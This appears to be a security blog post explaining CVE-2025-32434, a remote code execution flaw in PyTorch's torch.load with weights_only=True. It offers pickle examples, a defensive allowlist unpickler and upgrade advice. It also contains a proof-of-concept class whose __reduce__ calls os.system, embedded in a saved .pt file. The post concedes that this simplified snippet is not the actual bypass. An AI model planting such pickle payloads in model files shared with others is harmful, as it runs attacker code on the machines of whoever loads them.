PyTorch is one of the most popular deep learning libraries for Python, used by professionals and researchers for everything from computer vision to natural language processing. Its ease of use, fast computations on CUDA GPUs, and dynamic computation graphs make it a favorite. However, with popularity comes risk: a critical security issue, CVE-2025-32434, has been found in PyTorch versions up to 2.5.1.

This post explains what CVE-2025-32434 is, how it can be exploited, shows a code snippet of how the exploit works, and wraps up with details on patches and best practices. If you use PyTorch or handle .pt model files, this is a must-read.

What is CVE-2025-32434?

CVE-2025-32434 is a remote code execution (RCE) vulnerability in PyTorch’s torch.load() function, triggered even when it is called with weights_only=True. In simple terms, if you load a model from an untrusted .pt file, an attacker can execute arbitrary code on your machine and potentially gain full control.

Why is this dangerous?

Model files (.pt) can now be more than just data: they can hide malicious code. Sharing models with colleagues or downloading pre-trained weights from the web—a common pattern in the machine learning world—now carries risk if you’re running a vulnerable PyTorch version.

How Does the Vulnerability Work?

The vulnerability exists in how PyTorch deserializes files with torch.load(). Serialization is the process of converting data or objects into a storable format, and deserialization is the reverse. In PyTorch, the conventional file extension for serialized models is .pt.
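To make the serialize/deserialize cycle concrete: torch.save() and torch.load() are built on Python’s pickle protocol, so a plain standard-library pickle round trip (shown here instead of torch so the example stays dependency-free) illustrates the same idea.

```python
import pickle

# A stand-in for a model checkpoint: serialization turns the object into
# bytes, deserialization reconstructs the object from those bytes.
checkpoint = {"weights": [0.1, 0.2, 0.3], "epoch": 7}

blob = pickle.dumps(checkpoint)   # serialization: object -> bytes
restored = pickle.loads(blob)     # deserialization: bytes -> object

assert restored == checkpoint
```

The danger discussed below comes entirely from the deserialization half of this cycle: unpickling can do much more than rebuild plain data.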

When torch.load() is called with weights_only=True (an option designed to restrict deserialization to plain tensor data and primitive types, precisely so that untrusted files cannot run code), PyTorch is supposed to extract only the weights and reject embedded Python objects. However, in versions up to 2.5.1, a flaw in this restricted loader means that a crafted model file can bypass the check and execute code anyway.
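The intended behavior of weights_only=True resembles an allowlisting unpickler. The sketch below is my own minimal illustration using the standard library, not PyTorch’s actual implementation: only explicitly allowed names may be resolved during deserialization, so a payload pointing at os.system is rejected before it can run.

```python
import io
import os
import pickle

class AllowlistUnpickler(pickle.Unpickler):
    """Minimal sketch of an allowlisting unpickler (illustrative only,
    not PyTorch's real code): any global name not on the allowlist is
    rejected before it can be called."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked: {module}.{name}")

class Payload:
    def __reduce__(self):
        # Instructs the unpickler to call os.system at load time.
        return (os.system, ("echo HACKED",))

blob = pickle.dumps(Payload())
try:
    AllowlistUnpickler(io.BytesIO(blob)).load()
    blocked = False
except pickle.UnpicklingError:
    blocked = True  # os.system was never called

assert blocked
```

CVE-2025-32434 means that in PyTorch 2.5.1 and below, the real restricted loader behind weights_only=True could be bypassed, unlike this toy gatekeeper.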

Example Exploit Model

Let’s look at how someone might create a malicious model file that triggers this bug.

import os
import torch

class Malicious:
    # __reduce__ tells pickle how to reconstruct this object at load time:
    # here it instructs the unpickler to call os.system with our command.
    def __reduce__(self):
        return (os.system, ('echo HACKED > /tmp/hacked.txt',))

malicious_tensor = torch.tensor([1, 2, 3])
# Save a checkpoint that smuggles the malicious object in alongside real weights.
torch.save({'weights': malicious_tensor, 'exploit': Malicious()}, 'malicious.pt')

Now, if someone loads this file:

import torch
model = torch.load('malicious.pt', weights_only=True)

the payload executes, in this demo dropping the file /tmp/hacked.txt. A real attack could run almost any command! (This simplified snippet illustrates the pickle mechanism being abused; the actual CVE-2025-32434 exploit relies on a more involved bypass of the weights_only restrictions.)

What’s Happening?

Although weights_only=True is supposed to prevent Python code from running during deserialization, the restriction can be bypassed in 2.5.1 and below. The ‘exploit’ entry in the pickle stream triggers arbitrary code execution.
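The core mechanism is that pickle’s __reduce__ hook hands the unpickler an arbitrary callable plus arguments, and the unpickler calls it during loading. This harmless standard-library demo swaps os.system for the builtin sorted() to show the call happening at load time:

```python
import pickle

class CallsOnLoad:
    """During unpickling, pickle invokes the callable returned by
    __reduce__ with the given arguments; here that is the harmless
    builtin sorted(), but an attacker can supply os.system instead."""
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))

blob = pickle.dumps(CallsOnLoad())
result = pickle.loads(blob)   # sorted([3, 1, 2]) runs at load time

assert result == [1, 2, 3]
```

Nothing in the bytes themselves looks like "code"; the attack lives in which callable the stream names, which is why safe loaders must restrict name resolution.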

The issue has been fixed in PyTorch 2.6.0. You should upgrade immediately to stay safe:

pip install --upgrade torch

Do not load untrusted model files with torch.load() on older PyTorch versions, even with weights_only=True, since that flag does not protect you before 2.6.0. If you must load models from questionable sources, analyze or convert them first with offline tools, or run the process inside a secure, isolated environment.
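One practical belt-and-suspenders measure is to refuse to deserialize anything on a vulnerable build. The helper names below (is_vulnerable, load_checkpoint_safely) are my own illustration, not part of PyTorch’s API:

```python
def is_vulnerable(version: str) -> bool:
    """Return True for PyTorch versions <= 2.5.1 (affected by
    CVE-2025-32434). Handles build suffixes like '2.5.1+cu121' by
    keeping only the numeric part before '+'."""
    numeric = version.split("+")[0]
    parts = tuple(int(p) for p in numeric.split(".")[:3])
    return parts <= (2, 5, 1)

def load_checkpoint_safely(path: str):
    """Refuse to deserialize a file on a vulnerable PyTorch build.
    (Illustrative helper, not a PyTorch API.)"""
    import torch  # imported lazily so the version check stays stdlib-only
    if is_vulnerable(torch.__version__):
        raise RuntimeError("Upgrade to PyTorch >= 2.6.0 before loading checkpoints")
    return torch.load(path, weights_only=True)

assert is_vulnerable("2.5.1")
assert is_vulnerable("2.4.0+cu121")
assert not is_vulnerable("2.6.0")
```

This is no substitute for upgrading; it simply turns a silent risk into a loud error on machines that have not been patched yet.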

References

- PyTorch Security Advisory
- CVE-2025-32434 at NIST
- PyTorch docs: torch.load

Conclusion

CVE-2025-32434 is a wake-up call for everyone working with machine learning models: don’t take model files from the internet for granted, and always update fast when your tools announce security patches. If you used torch.load(weights_only=True) with untrusted models in PyTorch 2.5.1 or earlier, upgrade now and audit your exposure.

Machine learning is changing the world, but we must stay secure as we push the cutting edge.


Remember: Upgrading PyTorch is the easiest and most effective fix. Never load model files from sources you don’t trust, and keep watch for future security advisories.

Timeline

Published on: 04/18/2025 16:15:23 UTC
Last modified on: 05/28/2025 13:14:20 UTC